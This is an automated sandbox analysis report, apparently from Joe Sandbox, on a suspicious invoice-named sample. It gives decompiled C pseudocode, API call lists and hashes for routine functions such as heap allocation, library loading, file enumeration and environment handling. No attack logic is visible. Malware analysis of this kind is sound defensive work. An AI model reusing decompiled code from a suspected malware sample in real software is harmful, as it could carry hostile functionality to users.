                            				void* _t7;
                            				long _t8;
                            
                            				_t7 = __ecx;
                            				_t8 = _a4;
                            				if(_t8 > 0xffffffe0) {
                            					L7:
                            					 *((intOrPtr*)(E0131C9CE())) = 0xc;
                            					__eflags = 0;
                            					return 0;
                            				}
                            				if(_t8 == 0) {
                            					_t8 = _t8 + 1;
                            				}
                            				while(1) {
                            					_t4 = RtlAllocateHeap( *0x134655c, 0, _t8); // executed
                            					if(_t4 != 0) {
                            						break;
                            					}
                            					__eflags = E01320397();
                            					if(__eflags == 0) {
                            						goto L7;
                            					}
                            					_t6 = E01328686(_t7, __eflags, _t8);
                            					_pop(_t7);
                            					__eflags = _t6;
                            					if(_t6 == 0) {
                            						goto L7;
                            					}
                            				}
                            				return _t4;
                            			}








                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,013280E5,00000000,?,01320C3C,?,00000008,?,01323E2E,?,?,?), ref: 01320A57
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: bd511986b4eb213473a5afba6e0b1f55363d4da687cbf702641693d21949972b
                            • Instruction ID: d0d491d4b1c5357a9d0e9361b3dd82ea35b01d9fc5ca14c5b65755a1c777e319
                            • Opcode Fuzzy Hash: bd511986b4eb213473a5afba6e0b1f55363d4da687cbf702641693d21949972b
                            • Instruction Fuzzy Hash: C0E0ED36101235A7FA397A7DAC44B5F7A9C9F423A8F950360FD5992084CA20C908C2E4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E01314590(char* _a4) {
                            				struct HINSTANCE__* _t3;
                            
                            				_t6 = E01314BF0(0, _a4, 0);
                            				_t3 = LoadLibraryExW(_t2, 0, 8); // executed
                            				L01319803(_t6);
                            				return _t3;
                            			}





                            APIs
                              • Part of subcall function 01314BF0: MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,01314117,?,?,00001000), ref: 01314C08
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,01313540,?,?,?,?,00000000,0131263F,00000000,00000000), ref: 013145A9
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharLibraryLoadMultiWide
                            • String ID:
                            • API String ID: 2592636585-0
                            • Opcode ID: 0a818dc42502b5b334e135094be1d7b24d40ca11ec0670b01d43a2b70fb5341e
                            • Instruction ID: 692a96f333aa420022a00a78794f4d814ca8dce2f455900bb7bd02d4e2253a05
                            • Opcode Fuzzy Hash: 0a818dc42502b5b334e135094be1d7b24d40ca11ec0670b01d43a2b70fb5341e
                            • Instruction Fuzzy Hash: 2AD0A7B3B4031033E66021A93C06F5F69589BE1F56F090435F7089A1C4E550580943A6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0132BA5E(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
                            				void* _t10;
                            
                            				_t10 = CreateFileW(_a4, _a16, _a24, _a8, _a20, _a28 | _a32, 0); // executed
                            				return _t10;
                            			}





                            APIs
                            • CreateFileW.KERNEL32(00000000,00000000,?,0132BDC8,?,?,00000000,?,0132BDC8,00000000,0000000C), ref: 0132BA7B
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: ab088409fcd14db8c8c04050f73ef86e29dc03131c3fd2e8963f2c6e6efaa0bd
                            • Instruction ID: 4a89b12ab46b1856e3f7aeb0d995e8205a9c6c8902c3ec5bb69bc455b9639a83
                            • Opcode Fuzzy Hash: ab088409fcd14db8c8c04050f73ef86e29dc03131c3fd2e8963f2c6e6efaa0bd
                            • Instruction Fuzzy Hash: A7D06C3200010DBBDF128E84ED06EDA3BAAFB48714F014100BA5856020C736E821AB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            APIs
                              • Part of subcall function 6E2F2A70: PyMem_Malloc.PYTHON38(?,00000000), ref: 6E2F2AC9
                              • Part of subcall function 6E2F2A70: PyMem_Realloc.PYTHON38(?,?,?), ref: 6E2F2B8C
                            • PyMem_Malloc.PYTHON38(?,?,00000000,?), ref: 6E2F30A3
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Mem_$Malloc$Realloc
                            • String ID:
                            • API String ID: 2718381752-0
                            • Opcode ID: e5fabdcdbb270f12356f9159ff73dcc977f910d2a7bfa80e4af5295b506a8623
                            • Instruction ID: 861721ba17faf920f03d724c9567e34c821b74fc80ce66ac8d119c4941cdbae3
                            • Opcode Fuzzy Hash: e5fabdcdbb270f12356f9159ff73dcc977f910d2a7bfa80e4af5295b506a8623
                            • Instruction Fuzzy Hash: 5AF1ED31A9420ECBDB14CFADC8949ADF7B3FB86315B64412AD8569B305DB31E843CB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyMem_Malloc.PYTHON38(?,00000000), ref: 6E2F2AC9
                            • PyMem_Realloc.PYTHON38(?,?,?), ref: 6E2F2B8C
                            • PyUnicode_FromKindAndData.PYTHON38(00000004,?,00000000,?), ref: 6E2F2D50
                            • PyMem_Free.PYTHON38(?), ref: 6E2F2D5E
                            • PyMem_Free.PYTHON38(?), ref: 6E2F2D90
                            • PyErr_NoMemory.PYTHON38 ref: 6E2F2D99
                            • PyErr_NoMemory.PYTHON38(00000000), ref: 6E2F2FCE
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Mem_$Err_FreeMemory$DataFromKindMallocReallocUnicode_
                            • String ID:
                            • API String ID: 530066142-0
                            • Opcode ID: db6d7127cbf6248ec84b8285af16bd9a792257663f57e350e5be16424ec95eec
                            • Instruction ID: 4155524695651a6d804b26d30cfd82b0edaffca22831df2ae7ee49d45716b207
                            • Opcode Fuzzy Hash: db6d7127cbf6248ec84b8285af16bd9a792257663f57e350e5be16424ec95eec
                            • Instruction Fuzzy Hash: FA02C2B2E902AECFDB14CF9CC9A0AACF7F6FB47301B154269D8569B251D7319942CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 73%
                            			E0131E260(void* __ebx, signed int __edx, void* __edi, void* __esi, WCHAR* _a4, signed int* _a8) {
                            				signed int _v8;
                            				void* _v12;
                            				void* _v16;
                            				struct _SYSTEMTIME _v32;
                            				struct _SYSTEMTIME _v48;
                            				char _v556;
                            				char _v580;
                            				char _v588;
                            				char _v596;
                            				struct _WIN32_FIND_DATAW _v604;
                            				signed int* _v632;
                            				void* _v636;
                            				signed int _v648;
                            				FILETIME* _v1260;
                            				signed int _v1272;
                            				signed int _t54;
                            				WCHAR* _t56;
                            				signed int _t59;
                            				signed int _t65;
                            				signed int _t66;
                            				signed int _t67;
                            				void* _t71;
                            				signed int _t73;
                            				void* _t75;
                            				signed int _t77;
                            				signed int _t78;
                            				signed int _t84;
                            				signed int _t85;
                            				signed int _t86;
                            				signed int _t92;
                            				FILETIME* _t94;
                            				signed int _t95;
                            				long _t104;
                            				long _t105;
                            				signed int _t106;
                            				signed int _t119;
                            				signed int _t122;
                            				signed int* _t125;
                            				signed int* _t127;
                            				void* _t129;
                            				void* _t130;
                            				signed int _t131;
                            				signed int _t132;
                            				void* _t134;
                            				signed int _t135;
                            				void* _t136;
                            				signed int _t137;
                            
                            				_t119 = __edx;
                            				_t54 =  *0x133c008; // 0xa212446c
                            				_v8 = _t54 ^ _t131;
                            				_t56 = _a4;
                            				_push(__esi);
                            				_t125 = _a8;
                            				if(_t125 != 0) {
                            					if(_t56 == 0) {
                            						goto L1;
                            					} else {
                            						_push(__ebx);
                            						_t122 = FindFirstFileExW(_t56, 0,  &(_v604.ftCreationTime), 0, 0, 0);
                            						if(_t122 != 0xffffffff) {
                            							asm("sbb eax, eax");
                            							 *_t125 =  ~(_v604.ftCreationTime + 0xffffff80) & _v604.ftCreationTime;
                            							_t65 =  &_v596;
                            							_push(_t65);
                            							L33();
                            							_t125[2] = _t65;
                            							_t66 =  &_v588;
                            							_push(_t66);
                            							_t125[3] = _t119;
                            							L33();
                            							_t125[4] = _t66;
                            							_t67 =  &_v580;
                            							_push(_t67);
                            							_t125[5] = _t119;
                            							L33();
                            							_t125[6] = _t67;
                            							_t125[8] = _v604.dwReserved0;
                            							_t125[7] = _t119;
                            							_t71 = E0132618C( &(_t125[9]), 0x104,  &_v556);
                            							_t135 = _t134 + 0x18;
                            							if(_t71 != 0) {
                            								_push(0);
                            								_push(0);
                            								_push(0);
                            								_push(0);
                            								_push(0);
                            								E01321798();
                            								asm("int3");
                            								_push(_t131);
                            								_t132 = _t135;
                            								_t136 = _t135 - 0x254;
                            								_t73 =  *0x133c008; // 0xa212446c
                            								_v648 = _t73 ^ _t132;
                            								_t75 = _v636;
                            								_push(_t125);
                            								_t127 = _v632;
                            								if(_t75 != 0) {
                            									if(_t75 == 0xffffffff || _t127 == 0) {
                            										goto L18;
                            									} else {
                            										if(FindNextFileW(_t75,  &_v604) != 0) {
                            											asm("sbb eax, eax");
                            											 *_t127 =  ~(_v604.dwFileAttributes + 0xffffff80) & _v604.dwFileAttributes;
                            											_t84 =  &(_v604.ftCreationTime);
                            											_push(_t84);
                            											L33();
                            											_t127[2] = _t84;
                            											_t85 =  &(_v604.ftLastAccessTime);
                            											_push(_t85);
                            											_t127[3] = _t119;
                            											L33();
                            											_t127[4] = _t85;
                            											_t86 =  &(_v604.ftLastWriteTime);
                            											_push(_t86);
                            											_t127[5] = _t119;
                            											L33();
                            											_t127[6] = _t86;
                            											_t127[8] = _v604.nFileSizeLow;
                            											_t127[7] = _t119;
                            											_t78 = E0132618C( &(_t127[9]), 0x104,  &(_v604.cFileName));
                            											_t137 = _t136 + 0x18;
                            											if(_t78 == 0) {
                            												goto L20;
                            											} else {
                            												_push(0);
                            												_push(0);
                            												_push(0);
                            												_push(0);
                            												_push(0);
                            												E01321798();
                            												asm("int3");
                            												_push(_t132);
                            												_t92 =  *0x133c008; // 0xa212446c
                            												_v1272 = _t92 ^ _t137;
                            												_t94 = _v1260;
                            												if(_t94->dwLowDateTime != 0 || _t94->dwHighDateTime != 0) {
                            													_t94 = FileTimeToSystemTime(_t94,  &_v48);
                            													if(_t94 == 0) {
                            														goto L35;
                            													} else {
                            														_t94 = SystemTimeToTzSpecificLocalTime(0,  &_v48,  &_v32);
                            														if(_t94 == 0) {
                            															goto L35;
                            														} else {
                            															_push(0xffffffff);
                            															_push(_v32.wSecond & 0x0000ffff);
                            															_t95 = E013256B5(0, _t119, _t127, _v32.wYear & 0x0000ffff, _v32.wMonth & 0x0000ffff, _v32.wDay & 0x0000ffff, _v32.wHour & 0x0000ffff, _v32.wMinute & 0x0000ffff);
                            														}
                            													}
                            												} else {
                            													L35:
                            													_t95 = _t94 | 0xffffffff;
                            												}
                            												E0131786A();
                            												return _t95;
                            											}
                            										} else {
                            											_t104 = GetLastError();
                            											_t129 = 2;
                            											if(_t104 < _t129) {
                            												L28:
                            												_t77 = E0131C9CE();
                            												 *_t77 = 0x16;
                            												goto L19;
                            											} else {
                            												if(_t104 <= 3) {
                            													L30:
                            													_t77 = E0131C9CE();
                            													 *_t77 = _t129;
                            													goto L19;
                            												} else {
                            													if(_t104 == 8) {
                            														_t77 = E0131C9CE();
                            														 *_t77 = 0xc;
                            														goto L19;
                            													} else {
                            														if(_t104 == 0x12) {
                            															goto L30;
                            														} else {
                            															goto L28;
                            														}
                            													}
                            												}
                            											}
                            										}
                            									}
                            								} else {
                            									L18:
                            									 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            									_t77 = E01321788();
                            									L19:
                            									_t78 = _t77 | 0xffffffff;
                            									L20:
                            									E0131786A();
                            									return _t78;
                            								}
                            							} else {
                            								_t59 = _t122;
                            								goto L10;
                            							}
                            						} else {
                            							_t105 = GetLastError();
                            							_t130 = 2;
                            							if(_t105 < _t130) {
                            								L8:
                            								_t106 = E0131C9CE();
                            								 *_t106 = 0x16;
                            							} else {
                            								if(_t105 <= 3) {
                            									L13:
                            									_t106 = E0131C9CE();
                            									 *_t106 = _t130;
                            								} else {
                            									if(_t105 == 8) {
                            										_t106 = E0131C9CE();
                            										 *_t106 = 0xc;
                            									} else {
                            										if(_t105 == 0x12) {
                            											goto L13;
                            										} else {
                            											goto L8;
                            										}
                            									}
                            								}
                            							}
                            							_t59 = _t106 | 0xffffffff;
                            							L10:
                            							goto L11;
                            						}
                            					}
                            				} else {
                            					L1:
                            					 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            					_t59 = E01321788() | 0xffffffff;
                            					L11:
                            					E0131786A();
                            					return _t59;
                            				}
                            			}



















































                            APIs
                            • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 0131E2A9
                            • GetLastError.KERNEL32 ref: 0131E2B6
                              • Part of subcall function 0131E4A6: FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,0131E328,?), ref: 0131E4D2
                              • Part of subcall function 0131E4A6: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,0131E328,?,?,?,?,0131E328,?), ref: 0131E4E6
                            • FindNextFileW.KERNEL32(?,?,?), ref: 0131E3DC
                            • GetLastError.KERNEL32 ref: 0131E3E6
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Time$File$ErrorFindLastSystem$FirstLocalNextSpecific
                            • String ID:
                            • API String ID: 3693236040-0
                            • Opcode ID: 2c66bcd9672676ba3154a3e5d32477463e86a6f48e6baab1ffc9e53c955eb436
                            • Instruction ID: f873d4738913eaf9a1c2ae63fefe330f0c6efaf0fd50cc1f0d29a19ebbd97c76
                            • Opcode Fuzzy Hash: 2c66bcd9672676ba3154a3e5d32477463e86a6f48e6baab1ffc9e53c955eb436
                            • Instruction Fuzzy Hash: 6861F7719006199FD73AAF7CCC84AAAB7E8EF45328F000A79E916D7284DB35D9448B54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 84%
                            			E013261F0(void* __edx, signed int _a4, signed int _a8) {
                            				signed int _v0;
                            				signed char _v5;
                            				intOrPtr _v8;
                            				signed char _v9;
                            				signed int _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				intOrPtr _v24;
                            				signed int _v44;
                            				signed int _v92;
                            				signed int _v128;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed int _t116;
                            				signed int _t119;
                            				signed int _t120;
                            				signed int _t122;
                            				signed int _t123;
                            				signed int _t126;
                            				signed int _t127;
                            				signed int _t131;
                            				signed int _t133;
                            				signed int _t136;
                            				signed int _t138;
                            				signed int _t139;
                            				signed int _t142;
                            				void* _t143;
                            				signed int _t148;
                            				signed int* _t150;
                            				signed int* _t156;
                            				signed int _t163;
                            				signed int _t165;
                            				signed int _t167;
                            				intOrPtr _t168;
                            				signed int _t173;
                            				signed int _t175;
                            				signed int _t176;
                            				signed int _t180;
                            				signed int _t185;
                            				intOrPtr* _t186;
                            				signed int _t191;
                            				signed int _t196;
                            				signed int _t197;
                            				signed int _t204;
                            				intOrPtr* _t205;
                            				signed int _t214;
                            				signed int _t215;
                            				signed int _t217;
                            				signed int _t218;
                            				signed int _t220;
                            				signed int _t221;
                            				signed int _t223;
                            				intOrPtr _t225;
                            				void* _t231;
                            				signed int _t233;
                            				void* _t236;
                            				signed int _t237;
                            				signed int _t238;
                            				void* _t241;
                            				signed int _t244;
                            				signed int _t246;
                            				void* _t252;
                            				signed int _t253;
                            				signed int _t254;
                            				void* _t260;
                            				void* _t262;
                            				signed int _t263;
                            				intOrPtr* _t267;
                            				intOrPtr* _t271;
                            				signed int _t274;
                            				signed int _t276;
                            				signed int _t280;
                            				signed int _t282;
                            				void* _t283;
                            				void* _t284;
                            				void* _t285;
                            				void* _t286;
                            				signed int _t287;
                            				signed int _t289;
                            				signed int _t291;
                            				signed int _t292;
                            				signed int* _t293;
                            				signed int _t299;
                            				signed int _t300;
                            				CHAR* _t301;
                            				signed int _t303;
                            				signed int _t304;
                            				WCHAR* _t305;
                            				signed int _t306;
                            				signed int _t307;
                            				signed int* _t308;
                            				signed int _t309;
                            				signed int _t311;
                            				void* _t317;
                            				void* _t318;
                            				void* _t319;
                            				void* _t321;
                            				void* _t322;
                            				void* _t323;
                            				void* _t324;
                            
                            				_t283 = __edx;
                            				_t217 = _a4;
                            				if(_t217 != 0) {
                            					_t287 = _t217;
                            					_t116 = E01318680(_t217, 0x3d);
                            					_v16 = _t116;
                            					_t231 = _t286;
                            					__eflags = _t116;
                            					if(_t116 == 0) {
                            						L10:
                            						 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            						goto L11;
                            					} else {
                            						__eflags = _t116 - _t217;
                            						if(_t116 == _t217) {
                            							goto L10;
                            						} else {
                            							__eflags =  *((char*)(_t116 + 1));
                            							_t299 =  *0x13460bc; // 0xe55920
                            							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
                            							_v5 = _t120;
                            							__eflags = _t299 -  *0x13460c8; // 0xe572c0
                            							if(__eflags == 0) {
                            								L87();
                            								_t299 = _t120;
                            								_t120 = _v5;
                            								_t231 = _t299;
                            								 *0x13460bc = _t299;
                            							}
                            							_t218 = 0;
                            							__eflags = _t299;
                            							if(_t299 != 0) {
                            								L21:
                            								_t233 = _t287;
                            								_t122 = _v16 - _t233;
                            								_push(_t122);
                            								_push(_t233);
                            								L121();
                            								_v12 = _t122;
                            								__eflags = _t122;
                            								if(_t122 < 0) {
                            									L29:
                            									__eflags = _v5 - _t218;
                            									if(_v5 != _t218) {
                            										goto L12;
                            									} else {
                            										_t123 =  ~_t122;
                            										_v12 = _t123;
                            										_t27 = _t123 + 2; // 0x2
                            										_t236 = _t27;
                            										__eflags = _t236 - _t123;
                            										if(_t236 < _t123) {
                            											goto L11;
                            										} else {
                            											__eflags = _t236 - 0x3fffffff;
                            											if(_t236 >= 0x3fffffff) {
                            												goto L11;
                            											} else {
                            												_push(4);
                            												_push(_t236);
                            												_t300 = E0132850F(_t299);
                            												E013209EB(_t218);
                            												_t321 = _t321 + 0x10;
                            												__eflags = _t300;
                            												if(_t300 == 0) {
                            													goto L11;
                            												} else {
                            													_t237 = _v12;
                            													_t287 = _t218;
                            													_t126 = _a4;
                            													 *(_t300 + _t237 * 4) = _t126;
                            													 *(_t300 + 4 + _t237 * 4) = _t218;
                            													goto L34;
                            												}
                            											}
                            										}
                            									}
                            								} else {
                            									__eflags =  *_t299 - _t218;
                            									if( *_t299 == _t218) {
                            										goto L29;
                            									} else {
                            										E013209EB( *((intOrPtr*)(_t299 + _t122 * 4)));
                            										_t282 = _v12;
                            										__eflags = _v5 - _t218;
                            										if(_v5 != _t218) {
                            											while(1) {
                            												__eflags =  *(_t299 + _t282 * 4) - _t218;
                            												if( *(_t299 + _t282 * 4) == _t218) {
                            													break;
                            												}
                            												 *(_t299 + _t282 * 4) =  *(_t299 + 4 + _t282 * 4);
                            												_t282 = _t282 + 1;
                            												__eflags = _t282;
                            											}
                            											_push(4);
                            											_push(_t282);
                            											_t300 = E0132850F(_t299);
                            											E013209EB(_t218);
                            											_t321 = _t321 + 0x10;
                            											_t126 = _t287;
                            											__eflags = _t300;
                            											if(_t300 != 0) {
                            												L34:
                            												 *0x13460bc = _t300;
                            											}
                            										} else {
                            											_t126 = _a4;
                            											_t287 = _t218;
                            											 *(_t299 + _t282 * 4) = _t126;
                            										}
                            										__eflags = _a8 - _t218;
                            										if(_a8 == _t218) {
                            											goto L12;
                            										} else {
                            											_t238 = _t126;
                            											_t284 = _t238 + 1;
                            											do {
                            												_t127 =  *_t238;
                            												_t238 = _t238 + 1;
                            												__eflags = _t127;
                            											} while (_t127 != 0);
                            											_v12 = _t238 - _t284 + 2;
                            											_t301 = E01320B10(_t238 - _t284, _t238 - _t284 + 2, 1);
                            											_pop(_t241);
                            											__eflags = _t301;
                            											if(_t301 == 0) {
                            												L42:
                            												E013209EB(_t301);
                            												goto L12;
                            											} else {
                            												_t131 = E01320A73(_t301, _v12, _a4);
                            												_t322 = _t321 + 0xc;
                            												__eflags = _t131;
                            												if(_t131 != 0) {
                            													_push(_t218);
                            													_push(_t218);
                            													_push(_t218);
                            													_push(_t218);
                            													_push(_t218);
                            													E01321798();
                            													asm("int3");
                            													_t317 = _t322;
                            													_t323 = _t322 - 0xc;
                            													_push(_t218);
                            													_t220 = _v44;
                            													__eflags = _t220;
                            													if(_t220 != 0) {
                            														_push(_t301);
                            														_push(_t287);
                            														_push(0x3d);
                            														_t289 = _t220;
                            														_t133 = E013188E7(_t241);
                            														_v20 = _t133;
                            														_t244 = _t220;
                            														__eflags = _t133;
                            														if(_t133 == 0) {
                            															L54:
                            															 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            															goto L55;
                            														} else {
                            															__eflags = _t133 - _t220;
                            															if(_t133 == _t220) {
                            																goto L54;
                            															} else {
                            																_t303 =  *0x13460c0; // 0xe44410
                            																_t221 = 0;
                            																__eflags =  *(_t133 + 2);
                            																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
                            																_v9 = _t246;
                            																__eflags = _t303 -  *0x13460c4; // 0xe44410
                            																if(__eflags == 0) {
                            																	_push(_t303);
                            																	L104();
                            																	_t246 = _v9;
                            																	_t303 = _t133;
                            																	 *0x13460c0 = _t303;
                            																}
                            																__eflags = _t303;
                            																if(_t303 != 0) {
                            																	L64:
                            																	_v20 = _v20 - _t289 >> 1;
                            																	_t138 = E0132682B(_t289, _v20 - _t289 >> 1);
                            																	_v16 = _t138;
                            																	__eflags = _t138;
                            																	if(_t138 < 0) {
                            																		L72:
                            																		__eflags = _v9 - _t221;
                            																		if(_v9 != _t221) {
                            																			goto L56;
                            																		} else {
                            																			_t139 =  ~_t138;
                            																			_v16 = _t139;
                            																			_t72 = _t139 + 2; // 0x2
                            																			_t252 = _t72;
                            																			__eflags = _t252 - _t139;
                            																			if(_t252 < _t139) {
                            																				goto L55;
                            																			} else {
                            																				__eflags = _t252 - 0x3fffffff;
                            																				if(_t252 >= 0x3fffffff) {
                            																					goto L55;
                            																				} else {
                            																					_push(4);
                            																					_push(_t252);
                            																					_t304 = E0132850F(_t303);
                            																					E013209EB(_t221);
                            																					_t323 = _t323 + 0x10;
                            																					__eflags = _t304;
                            																					if(_t304 == 0) {
                            																						goto L55;
                            																					} else {
                            																						_t253 = _v16;
                            																						_t289 = _t221;
                            																						_t142 = _v0;
                            																						 *(_t304 + _t253 * 4) = _t142;
                            																						 *(_t304 + 4 + _t253 * 4) = _t221;
                            																						goto L77;
                            																					}
                            																				}
                            																			}
                            																		}
                            																	} else {
                            																		__eflags =  *_t303 - _t221;
                            																		if( *_t303 == _t221) {
                            																			goto L72;
                            																		} else {
                            																			E013209EB( *((intOrPtr*)(_t303 + _t138 * 4)));
                            																			_t276 = _v16;
                            																			__eflags = _v9 - _t221;
                            																			if(_v9 != _t221) {
                            																				while(1) {
                            																					__eflags =  *(_t303 + _t276 * 4) - _t221;
                            																					if( *(_t303 + _t276 * 4) == _t221) {
                            																						break;
                            																					}
                            																					 *(_t303 + _t276 * 4) =  *(_t303 + 4 + _t276 * 4);
                            																					_t276 = _t276 + 1;
                            																					__eflags = _t276;
                            																				}
                            																				_push(4);
                            																				_push(_t276);
                            																				_t304 = E0132850F(_t303);
                            																				E013209EB(_t221);
                            																				_t323 = _t323 + 0x10;
                            																				_t142 = _t289;
                            																				__eflags = _t304;
                            																				if(_t304 != 0) {
                            																					L77:
                            																					 *0x13460c0 = _t304;
                            																				}
                            																			} else {
                            																				_t142 = _v0;
                            																				_t289 = _t221;
                            																				 *(_t303 + _t276 * 4) = _t142;
                            																			}
                            																			__eflags = _a4 - _t221;
                            																			if(_a4 == _t221) {
                            																				goto L56;
                            																			} else {
                            																				_t254 = _t142;
                            																				_t81 = _t254 + 2; // 0x2
                            																				_t285 = _t81;
                            																				do {
                            																					_t143 =  *_t254;
                            																					_t254 = _t254 + 2;
                            																					__eflags = _t143 - _t221;
                            																				} while (_t143 != _t221);
                            																				_t82 = (_t254 - _t285 >> 1) + 2; // 0x0
                            																				_v16 = _t82;
                            																				_t305 = E01320B10(_t254 - _t285 >> 1, _t82, 2);
                            																				_pop(_t258);
                            																				__eflags = _t305;
                            																				if(_t305 == 0) {
                            																					L85:
                            																					E013209EB(_t305);
                            																					goto L56;
                            																				} else {
                            																					_t148 = E0132618C(_t305, _v16, _v0);
                            																					_t324 = _t323 + 0xc;
                            																					__eflags = _t148;
                            																					if(_t148 != 0) {
                            																						_push(_t221);
                            																						_push(_t221);
                            																						_push(_t221);
                            																						_push(_t221);
                            																						_push(_t221);
                            																						E01321798();
                            																						asm("int3");
                            																						_push(_t317);
                            																						_t318 = _t324;
                            																						_push(_t289);
                            																						_t291 = _v92;
                            																						__eflags = _t291;
                            																						if(_t291 != 0) {
                            																							_t260 = 0;
                            																							_t150 = _t291;
                            																							__eflags =  *_t291;
                            																							if( *_t291 != 0) {
                            																								do {
